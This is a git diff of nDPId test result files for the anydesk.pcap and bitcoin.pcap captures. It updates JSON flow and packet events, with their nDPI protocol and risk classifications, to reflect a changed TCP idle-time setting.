+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6963,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1591342198821,"flow_last_seen":1591342244652,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":607,"flow_avg_l4_payload_len":30,"midstream":1,"thread_ts_msec":1591342255171,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.239.144","src_port":36351,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+01201{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6963,"source":"anydesk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":6943,"flow_first_seen":1591342199201,"flow_last_seen":1591342255171,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2417415,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":1591342255171,"l3_proto":"ip4","src_ip":"192.168.149.129","dst_ip":"51.83.238.219","src_port":43535,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"TLS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"}} 00562{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":6963,"source":"anydesk.pcap","alias":"nDPId-test","packets-captured":6963,"packets-processed":6963,"total-skipped-flows":0,"total-l4-data-len":2418022,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":17,"global_ts_msec":1591342255171} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 6963/6963 diff --git a/test/results/bitcoin.pcap.out b/test/results/bitcoin.pcap.out index fe65792f0..b03afa08d 100644 
--- a/test/results/bitcoin.pcap.out +++ b/test/results/bitcoin.pcap.out 
@@ -1,44 +1,44 @@ 00458{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"bitcoin.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"bitcoin.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1301327937725} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301327937725,"flow_last_seen":1301327937725,"flow_idle_time":7440000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301327937725,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"188.165.213.169","src_port":55317,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00615{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1301327937725,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301327937725,"pkt":"ACPrIpS0ACNshovhCABFAACdb3BAAEAGdmXAqAGOvKXVqdgVII1UFpaF9ORId4AY\/\/\/XwQAAAQEICicy22Mwkrss+b602XZlcnNpb24AAAAAAFUAAAABfQAAAQAAAAAAAABBsJBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/vKXVqSCNAQAAAAAAAAAAAAAAAAAAAAAA\/\/\/AqAGOII3ZMDrPGxAeDAD6vQEA"} -00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301327937725,"flow_last_seen":1301327937725,"flow_idle_time":7440000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301327937725,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"188.165.213.169","src_port":55317,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1301327937800,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301327937800,"pkt":"ACNshovhACPrIpS0CABFAACd8zJAADQG\/qK8pdWpwKgBjiCN2BX05Eh3VBaWhYAYAC7fMwAAAQEICjCSu0gnMttj+b602XZlcnNpb24AAAAAAFUAAACcfAAAAQAAAAAAAABqsJBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/JmCEHtgVAQAAAAAAAAAAAAAAAAAAAAAA\/\/+8pdWpII1MLcnArv8XlgAGwwEA"} -01828{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1301327937931,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1067,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1067,"pkt_l4_len":1033,"thread_ts_msec":1301327937931,"pkt":"ACPrIpS0ACNshovhCABFAAQdZEVAAEAGfhDAqAGOvKXVqdgVII1UFpbu9ORI4IAY\/\/\/JGQAAAQEICicy22UwkrtL+b602XZlcmFjawAAAAAAAAAAAAD5vrTZZ2V0YWRkcgAAAAAAAAAAAF324OL5vrTZZ2V0YmxvY2tzAAAApQMAAGlfIuqcfAAAHKh7ybVTxuZIQjrl7yTcgS++hNhBt1zq9NegAAAAAAAA0isW7TPLR9+QJv0A5WbZVCvm695mFYsw+RcAAAAAAAAKtKqLikjG018uz8LfLAtdjFIkeP\/i1erq1gAAAAAAAJBdQRxOhTejsSgFAkOe4jLdh+MgkNThEJ18AAAAAAAAuqLvaBfSt3u\/xIqIdA14a1vMRWgufw\/9NSQAAAAAAABmO+ZaHQMV8GVsd2tLL4rFQTc0+9Vfwkt\/KAAAAAAAAJT+LTuh4xfC31zGm\/GrV7uiO60OaIRMkzcNAAAAAAAAuhdRV0aXd6Zg2v\/d1GRW41CXeTNnyZ2lADQAAAAAAADN6C3MlB3uxd0izHdkP3dhS0au0yU7AWAQZwAAAAAAAL+B7POHga71M99A8Eu3CYdV7ruvTTFqTRaEAAAAAAAA3UsnAThWfVMwqZa+fYK\/+mnwaocTsbQIG1kAAAAAAADey3zxujtbDGk\/QTgO92YcU4PswnA6nOZ6FgAAAAAAAMDzxV+Dq1G5LChOJMi\/klliIw7dOCRLUwU1AAAAAAAAPos8A4n6clF7nKE4hFivm22s790lzTk\/xUsAAAAAAAC0sS5A1Mm4fwV3yc3Q1LndsofGdqv023cDhAAAAAAAAGvuGwU2Et\/fX33Zfbvd3fo\/8TaDBcaUcU3CAAAAAAAAP2JWK5H+eMf+Pv\/jSxNvOoqfqtxRlUdLIhEAAAAAAADJveYZh3372qwQQlL9GVXITa9jJ6DXXZhGDQAAAAAAAKMYV6DpTz6VcKhTn2GDUxJn1w6c\
/OztngqRAAAAAAAABDCPkjdagfw0FOqHQEeRGYOTGUOY4U7Z+TMAAAAAAABH73UkZZo8i3KUfaLV4BIT5FRuJgLU9+S6PwAAAAAAAEhKQKlsPJI3JIw8Tb+HHwelgYW13heoG+NwAAAAAAAAGoeNNbO0PKw7FoNOsSIzS8W\/U8wXt9nuho8AAAAAAADVlxLK6O44NewFXywS+BNdzYycb7g7WSY\/qQEAAAAAAKqI+qWcSpEbTrldQNWUJik+3hdENRtaz0ynBAAAAAAA\/6kPGMjbu4hU+GZN83C9X6Hc1si6bqd\/l3UhAAAAAABKw0jIrFFXJp9oPx6NizqHl5jwjXfMij2VrHIgAAAAAG\/ijAq28bNywaaiRq5j90+THoNl4VoInGjWGQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328089970,"flow_last_seen":1301328089970,"flow_idle_time":7440000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328089970,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"69.118.54.122","src_port":55328,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00615{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1301328089970,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301328089970,"pkt":"ACPrIpS0ACNshovhCABFAACdrppAAEAGTZrAqAGORXY2etggII0QKtRyRVLzIYAY\/\/\/YagAAAQEICicy4VQAPPkD+b602XZlcnNpb24AAAAAAFUAAAABfQAAAQAAAAAAAADZsJBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/RXY2eiCNAQAAAAAAAAAAAAAAAAAAAAAA\/\/8mYIQeII3pIMJ+i724nwBQvgEA"} 
-00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328089970,"flow_last_seen":1301328089970,"flow_idle_time":7440000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328089970,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"69.118.54.122","src_port":55328,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1301328090023,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301328090023,"pkt":"ACNshovhACPrIpS0CABFAACdT81AAHYGdmdFdjZ6wKgBjiCN2CBFUvMhECrU24AYAQRFgAAAAQEICgA8+QknMuFU+b602XZlcnNpb24AAAAAAFUAAAACfQAAAQAAAAAAAADZsJBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/JmCEHtggAQAAAAAAAAAAAAAAAAAAAAAA\/\/9FdjZ6II3xDaOK7c9BwgAGwwEA"} -00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1301328090082,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1301328090082,"pkt":"ACNshovhACPrIpS0CABFAABIT85AAHYGdrtFdjZ6wKgBjiCN2CBFUvOKECrU24AYAQQkRgAAAQEICgA8+RAnMuFV+b602XZlcmFjawAAAAAAAAAAAAA="} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":81,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328319392,"flow_last_seen":1301328319392,"flow_idle_time":7440000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328319392,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"74.89.181.229","src_port":55348,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1301328319392,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301328319392,"pkt":"ACPrIpS0ACNshovhCABFAACdlslAAEAG4RzAqAGOSlm15dg0II2cIEOJr5xIoIAY\/\/\/04QAAAQEICicy6kgDS\/0c+b602XZlcnNpb24AAAAAAFUAAAABfQAAAQAAAAAAAAC\/sZBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/Slm15SCNAQAAAAAAAAAAAAAAAAAAAAAA\/\/8mYIQeII2qu+Pk33arXQC9vgEA"} -00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":81,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328319392,"flow_last_seen":1301328319392,"flow_idle_time":7440000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328319392,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"74.89.181.229","src_port":55348,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00614{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1301328319451,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301328319451,"pkt":"ACNshovhACPrIpS0CABFAACdR2RAAHYG+oFKWbXlwKgBjiCN2DSvnEignCBD8oAYAQSuQgAAAQEICgNL\/SInMupI+b602XZlcnNpb24AAAAAAFUAAAAAfQAAAQAAAAAAAAC4sZBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/JmCEHtg0AQAAAAAAAAAAAAAAAAAAAAAA\/\/9KWbXlII1O39\/bLGJPkgAHwwEA"} -00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1301328319554,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1301328319554,"pkt":"ACNshovhACPrIpS0CABFAABIR4lAAHYG+rFKWbXlwKgBjiCN2DSvnEkJnCBD8oAYAQTU7AAAAQEICgNL\/S8nMupI+b602XZlcmFjawAAAAAAAAAAAAA="} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":201,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328472925,"flow_last_seen":1301328472925,"flow_idle_time":7440000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328472925,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"66.68.83.22","src_port":55383,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00615{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":201,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1301328472925,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301328472925,"pkt":"ACPrIpS0ACNshovhCABFAACde+1AAEAGZt3AqAGOQkRTFthXII0tj7Vf9ZidkYAY\/\/+IsAAAAQEICicy8EYAAAAA+b602XZlcnNpb24AAAAAAFUAAAABfQAAAQAAAAAAAABYspBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/QkRTFiCNAQAAAAAAAAAAAAAAAAAAAAAA\/\/8mYIQeII21Dgd4gTLgpgDgvgEA"} -00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":201,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328472925,"flow_last_seen":1301328472925,"flow_idle_time":7440000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328472925,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"66.68.83.22","src_port":55383,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00614{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":202,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1301328472987,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301328472987,"pkt":"ACNshovhACPrIpS0CABFAACdMqtAAG8GgR9CRFMWwKgBjiCN2Ff1mJ2RLY+1yIAY\/5aM3QAAAQEICgBK7W0nMvBG+b602XZlcnNpb24AAAAAAFUAAACcfAAAAQAAAAAAAABZspBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/JmCEHthXAQAAAAAAAAAAAAAAAAAAAAAA\/\/9CRFMWII0z3Rs+AfeDdwAHwwEA"} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":203,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1301328473077,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1301328473077,"pkt":"ACNshovhACPrIpS0CABFAABIMqxAAG8GgXNCRFMWwKgBjiCN2Ff1mJ36LY+1yIAY\/5avrAAAAQEICgBK7W4nMvBG+b602XZlcmFjawAAAAAAAAAAAAA="} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301327937725,"flow_last_seen":1301327937725,"flow_idle_time":7560000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301327937725,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"188.165.213.169","src_port":55317,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00615{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1301327937725,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301327937725,"pkt":"ACPrIpS0ACNshovhCABFAACdb3BAAEAGdmXAqAGOvKXVqdgVII1UFpaF9ORId4AY\/\/\/XwQAAAQEICicy22Mwkrss+b602XZlcnNpb24AAAAAAFUAAAABfQAAAQAAAAAAAABBsJBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/vKXVqSCNAQAAAAAAAAAAAAAAAAAAAAAA\/\/\/AqAGOII3ZMDrPGxAeDAD6vQEA"} +00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301327937725,"flow_last_seen":1301327937725,"flow_idle_time":7560000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301327937725,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"188.165.213.169","src_port":55317,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1301327937800,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301327937800,"pkt":"ACNshovhACPrIpS0CABFAACd8zJAADQG\/qK8pdWpwKgBjiCN2BX05Eh3VBaWhYAYAC7fMwAAAQEICjCSu0gnMttj+b602XZlcnNpb24AAAAAAFUAAACcfAAAAQAAAAAAAABqsJBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/JmCEHtgVAQAAAAAAAAAAAAAAAAAAAAAA\/\/+8pdWpII1MLcnArv8XlgAGwwEA"} +01828{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1301327937931,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1067,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1067,"pkt_l4_len":1033,"thread_ts_msec":1301327937931,"pkt":"ACPrIpS0ACNshovhCABFAAQdZEVAAEAGfhDAqAGOvKXVqdgVII1UFpbu9ORI4IAY\/\/\/JGQAAAQEICicy22UwkrtL+b602XZlcmFjawAAAAAAAAAAAAD5vrTZZ2V0YWRkcgAAAAAAAAAAAF324OL5vrTZZ2V0YmxvY2tzAAAApQMAAGlfIuqcfAAAHKh7ybVTxuZIQjrl7yTcgS++hNhBt1zq9NegAAAAAAAA0isW7TPLR9+QJv0A5WbZVCvm695mFYsw+RcAAAAAAAAKtKqLikjG018uz8LfLAtdjFIkeP\/i1erq1gAAAAAAAJBdQRxOhTejsSgFAkOe4jLdh+MgkNThEJ18AAAAAAAAuqLvaBfSt3u\/xIqIdA14a1vMRWgufw\/9NSQAAAAAAABmO+ZaHQMV8GVsd2tLL4rFQTc0+9Vfwkt\/KAAAAAAAAJT+LTuh4xfC31zGm\/GrV7uiO60OaIRMkzcNAAAAAAAAuhdRV0aXd6Zg2v\/d1GRW41CXeTNnyZ2lADQAAAAAAADN6C3MlB3uxd0izHdkP3dhS0au0yU7AWAQZwAAAAAAAL+B7POHga71M99A8Eu3CYdV7ruvTTFqTRaEAAAAAAAA3UsnAThWfVMwqZa+fYK\/+mnwaocTsbQIG1kAAAAAAADey3zxujtbDGk\/QTgO92YcU4PswnA6nOZ6FgAAAAAAAMDzxV+Dq1G5LChOJMi\/klliIw7dOCRLUwU1AAAAAAAAPos8A4n6clF7nKE4hFivm22s790lzTk\/xUsAAAAAAAC0sS5A1Mm4fwV3yc3Q1LndsofGdqv023cDhAAAAAAAAGvuGwU2Et\/fX33Zfbvd3fo\/8TaDBcaUcU3CAAAAAAAAP2JWK5H+eMf+Pv\/jSxNvOoqfqtxRlUdLIhEAAAAAAADJveYZh3372qwQQlL9GVXITa9jJ6DXXZhGDQAAAAAAAKMYV6DpTz6VcKhTn2GDUxJn1w6c\
/OztngqRAAAAAAAABDCPkjdagfw0FOqHQEeRGYOTGUOY4U7Z+TMAAAAAAABH73UkZZo8i3KUfaLV4BIT5FRuJgLU9+S6PwAAAAAAAEhKQKlsPJI3JIw8Tb+HHwelgYW13heoG+NwAAAAAAAAGoeNNbO0PKw7FoNOsSIzS8W\/U8wXt9nuho8AAAAAAADVlxLK6O44NewFXywS+BNdzYycb7g7WSY\/qQEAAAAAAKqI+qWcSpEbTrldQNWUJik+3hdENRtaz0ynBAAAAAAA\/6kPGMjbu4hU+GZN83C9X6Hc1si6bqd\/l3UhAAAAAABKw0jIrFFXJp9oPx6NizqHl5jwjXfMij2VrHIgAAAAAG\/ijAq28bNywaaiRq5j90+THoNl4VoInGjWGQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328089970,"flow_last_seen":1301328089970,"flow_idle_time":7560000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328089970,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"69.118.54.122","src_port":55328,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00615{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1301328089970,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301328089970,"pkt":"ACPrIpS0ACNshovhCABFAACdrppAAEAGTZrAqAGORXY2etggII0QKtRyRVLzIYAY\/\/\/YagAAAQEICicy4VQAPPkD+b602XZlcnNpb24AAAAAAFUAAAABfQAAAQAAAAAAAADZsJBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/RXY2eiCNAQAAAAAAAAAAAAAAAAAAAAAA\/\/8mYIQeII3pIMJ+i724nwBQvgEA"} 
